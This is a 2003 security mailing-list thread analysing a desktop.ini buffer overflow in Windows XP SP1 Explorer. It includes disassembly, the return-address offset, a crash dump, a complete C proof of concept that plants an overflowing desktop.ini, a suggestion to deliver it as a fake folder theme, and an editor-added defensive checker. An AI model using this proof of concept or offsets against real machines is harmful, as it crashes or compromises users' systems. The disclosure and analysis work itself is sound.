Detailed analysis: Buffer overflow in Explorer.exe on Windows XP SP1

From: Executable Security (exurity_at_rogers.com)
Date: 05/11/03

    To: <bugtraq@securityfocus.com>
    Date: Sun, 11 May 2003 03:28:54 -0500
    
    

    Hi, there:

    We were able to duplicate what was reported by Kristopher Matthews and aT4r
    InsaN3. Actually, if you have the following test scenario:

    File/Dir             Explanation
    C:\
    C:\temp\desktop.ini  Overflowing text file
    C:\test              directory

    The c:\temp\desktop.ini is the buffer-overflowing text file. Then, it
    crashes not only Explorer.exe, but also Internet Explorer, and
    application programs (it crashed UltraEdit) that use the file-open dialog box
    when trying to scan the c:\ hard drive. However, you can do the following safely
    from a DOS prompt for the directory c:\test:

    Explorer c:\test

    Of course, you cannot browse C:\test from the Explorer.exe GUI starting from
    the C:\ root directory because of the overflowing c:\temp\desktop.ini file.
    Actually, I assume the overflowing file, no matter where it is located in
    the subdirectory tree, will crash Explorer.exe when started from any directory
    above the overflowing desktop.ini file (I did not fully test this, though).

    Down to the assembly level, this bug lies in the shell32.dll file as follows:

    7740F3C3 lea  eax, [ebp-21Ch]          ; full path to the filename \desktop.in
    7740F3C9 push eax
    7740F3CA push 800h                     ; should be 400h I believe
    7740F3CF lea  eax, [ebp-0A1Ch]
    7740F3D5 push eax
    7740F3D6 push offset a_shellclassinf   ; ".ShellClassInfo"
    7740F3DB call ds:GetPrivateProfileSectionW

    When GetPrivateProfileSectionW is called, it assumes the buffer to be as
    large as two times 800h. As you can see, the local buffer is only A1Ch -
    21Ch = 800h for this string. So, it overflows if the desktop.ini contains a
    long string. MSDN documents the third parameter of GetPrivateProfileSection
    as follows:

    nSize
    Specifies the size, in characters, of the buffer pointed to by the
    lpReturnedString parameter.

    To be precise, the buffer-overflowing structure for this bug is as follows:

    | --------------------- A1C ---------| EBP | RET | -----------------> higher address

    The replaceable RET address is located at (A1C+4)/2 = 510.

    Due to the size limitation set by the 800h as well as the fact that the
    overflowing string is converted to Unicode, the chance of executing
    malicious code (Unicode exploit code as well as an exploitable RET address) is
    very limited. That is the reason we are documenting it in detail here.

    We do not know how this bug affects shell32.dll files on other Windows
    versions.

    With due credits to those who wrote the emails quoted below.

    Peter Huang
    http://members.rogers.com/exurity/

    -----Original Message-----
    From: Kristopher Matthews [mailto:krism@mailsnare.net]
    Sent: Friday, May 09, 2003 11:43 AM
    To: 'Ryan Yagatich'
    Cc: vuln-dev@securityfocus.com
    Subject: RE: Buffer overflow in Explorer.exe

    I have tested and duplicated this behavior on a fully patched/updated
    Windows XP Pro system.

    1. The overflow is for that particular key, AFAICT.
    1a. It will not work for the root (c:/) directory; explorer.exe does not
    parse 'desktop.ini' for that directory. It will, however, work for any other
    directory.
    2. It crashes explorer.exe (which runs the task bar/start menu, etc.) - It
    looks for all the world like a standard buffer overflow; I believe a more
    carefully crafted 'desktop.ini' file could cause explorer.exe to
    unintentionally execute arbitrary code.
    3. Download and execute untrusted code? Combine this with any of the other
    popular exploits for Windows; also, it wouldn't be terribly hard to get a
    user to download a 'desktop.ini' file to their "My Documents" directory (in
    the guise of, say, a folder theme, which Windows does support; e.g.
    different background, file layout, etc.); bam, whenever they open that
    directory, explorer crashes.

    Regards,
    Kristopher

    -----Original Message-----
    From: Ryan Yagatich [mailto:ryany@pantek.com]
    Sent: Thursday, May 08, 2003 6:28 PM
    To: at4r@3wdesign.es
    Cc: vuln-dev@securityfocus.com

    Hi,
            I don't quite understand the purpose behind this code. It creates
    a read-only file '/aT4r[at]3WDesign.es Security/desktop.ini' with the
    contents of

    [.ShellClassInfo]
    AAAAAAAAAAAA {x2301}

            And then terminates? I don't have a windows machine available to
    really explore this any, but what makes that entry in desktop.ini cause
    this? Furthermore, is this issue only for that particular key or is it
    generally just key/excessive parameter/missing value size that is
    affected? And additionally, you mention that explorer will no longer be
    able to operate when trying to browse the hard disk, but does this mean
    globally, or when they try to browse the c:/ drive, or just that
    particular folder?
            Please send me more information about this (even if it references
    past posts that I have missed) so that I can better understand the
    severity of this. Especially since, to me, I still see it as someone needing
    to download and execute untrusted software which causes a system crash,
    and if that were going to happen there are far worse things that can be
    done besides creating a small text file.

    Thanks,
    Ryan Yagatich

    ,_____________________________________________________,
    \ Ryan Yagatich support@pantek.com \
    / Pantek Incorporated (877) LINUX-FIX /
    \ http://www.pantek.com/security (440) 519-1802 \
    / Are your networks secure? Are you certain? /
    \___E8354282324E636DB5FF7B8A6EDED51FD02C06C68D3DB695___\

    On Wed, 7 May 2003, aT4r InsaN3 wrote:

    >This bug allows a malicious attacker to execute data with privileges of a
    >user that is browsing the hard disk with explorer.
    >
    >tested against winxp SP1
    >
    >example code provided.
    >
    <snip>
    >
    > strcpy(path,"\\aT4r[at]3WDesign.es Security");
    > mkdir(path);
    > SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);
    >
    > strcat(path,"\\desktop.ini");
    > bof=fopen(path,"w");
    > fputs("[.ShellClassInfo]\n",bof);
    > memset(evil,'A',BUFF);
    > fputs(evil,bof);
    > fclose(bof);
    <snip>

    -----Original Message-----
    From: aT4r InsaN3 [mailto:at4r@hotmail.com]
    Sent: Wednesday, May 07, 2003 3:54 PM
    To: vuln-dev@securityfocus.com
    Subject: Buffer overflow in Explorer.exe

    This bug allows a malicious attacker to execute data with privileges of a
    user that is browsing the hard disk with explorer.

    tested against winxp SP1

    example code provided.

    /*

            Buffer Overflow in explorer.exe - Proof of Concept
            Tested only against: Windows XP SP1

            Found by aT4r@3wdesign.es

            Greetings to:
            - #Haxorcitos@efnet= { "Tarako", "Croulder", "Drakar" , "[back]", "tyr" }:
            - #localhost and #darknet

            Usage: just execute this file.
                    This code will crash your explorer every time you try to browse your harddisk
                    execute this program again to delete the evil file ;-)

            (3ec.464): Access violation - code c0000005 (first chance)
            First chance exceptions are reported before any exception handling.
            This exception may be expected and handled.
            eax=00410041 ebx=0012aca8 ecx=77e5e1c4 edx=002f0000 esi=00121b70 edi=000ece90
            eip=00410041 esp=0177dfb0 ebp=00410041 iopl=0 nv up ei pl zr na po nc
            cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246
            00410041 ?? ???

            3W Design Security 2003. http://www.3WDesign.es/
    */

    #include <direct.h>
    #include <stdio.h>
    #include <stdlib.h>     /* exit() */
    #include <string.h>     /* strcpy(), strcat(), memset() */
    #include <windows.h>
    #include <sys/stat.h>

    #define BUFF 2300
    int main(void){

            char path[256];
            char evil[BUFF+1]="";
            FILE *bof;
            struct stat st;
            printf("\n . .. ...: \tBuffer overflow in explorer.exe\t\t:... .. .\n . .. ...: \tProof of Concept (aT4r@3wdesign.es)\t:... .. .\n\n");
            strcpy(path,"\\aT4r[at]3WDesign.es Security");
            mkdir(path);
            SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);

            strcat(path,"\\desktop.ini");
            if (stat(path,&st)==0)
                    { remove(path); exit(1);}//just execute this program twice to remove this file :P
            bof=fopen(path,"w");
            fputs("[.ShellClassInfo]\n",bof);   /* the section shell32 reads via GetPrivateProfileSectionW */
            memset(evil,'A',BUFF);               /* one entry of BUFF 'A's under that section */
            fputs(evil,bof);
            fclose(bof);
            printf("evil file: %s Created. Try to browse your Harddisk O:-)\n",path);
            return 0;

    }

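    The root cause in Peter Huang's analysis is a units mismatch: nSize is passed as 800h characters while the stack buffer holds 800h bytes (400h WCHARs). The following checker, added here by the editor and not part of any of the quoted mails, flags desktop.ini files whose [.ShellClassInfo] section would exceed that real capacity. It models the API's return format under the assumption that entries come back verbatim (with or without '='), NUL-separated and double-NUL-terminated, capped at nSize characters; the byte offsets are the ones quoted in the post, and the sample files are constructed.

```python
import re

# Figures from the analysis: buffer at [ebp-0A1Ch] holds 0x800 bytes of WCHARs,
# nSize is passed as 0x800 characters, saved RET sits at (0xA1C+4)/2 characters.
BUFFER_CHARS = 0x800 // 2            # real capacity in WCHARs (0x400)
CLAIMED_CHARS = 0x800                # nSize actually passed to the API
RET_CHAR_OFFSET = (0xA1C + 4) // 2   # 0x510

_SECTION_RE = re.compile(r"^\s*\[(?P<name>[^\]]+)\]\s*$")


def section_lines(ini_text, section):
    """Raw entry lines of `section` (name compared case-insensitively, as the
    profile API does), skipping blank lines and ';' comments."""
    lines, inside = [], False
    for raw in ini_text.splitlines():
        m = _SECTION_RE.match(raw)
        if m:
            inside = m.group("name").lower() == section.lower()
            continue
        if inside:
            line = raw.strip()
            if line and not line.startswith(";"):
                lines.append(line)
    return lines


def required_chars(lines):
    """Characters GetPrivateProfileSectionW needs to return these entries:
    each entry plus its NUL, plus the terminating second NUL (assumption:
    entries are returned verbatim, '=' or not, as the PoC's bare run of 'A's shows)."""
    return sum(len(l) + 1 for l in lines) + 1


def classify_desktop_ini(ini_text):
    """Classify a desktop.ini by how far its [.ShellClassInfo] section runs past
    the 0x400-WCHAR buffer. The API still caps the copy at nSize characters, so
    the overrun is bounded by CLAIMED_CHARS - BUFFER_CHARS."""
    need = required_chars(section_lines(ini_text, ".ShellClassInfo"))
    copied = min(need, CLAIMED_CHARS)
    if copied <= BUFFER_CHARS:
        verdict = "ok"
    elif copied <= RET_CHAR_OFFSET:
        verdict = "overflows_locals"
    else:
        verdict = "overwrites_return_address"
    return {"needed": need, "copied": copied, "verdict": verdict}


# Constructed samples: a normal folder-customisation file and one shaped like
# the PoC's output (section header followed by 2300 'A's).
BENIGN = "[.ShellClassInfo]\r\nIconFile=folder.ico\r\nIconIndex=0\r\n"
OVERSIZED = "[.ShellClassInfo]\n" + "A" * 2300 + "\n"
```

    Run over a directory tree, `classify_desktop_ini` gives a quick triage of whether a found desktop.ini merely crashes the parser or reaches the saved return address.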


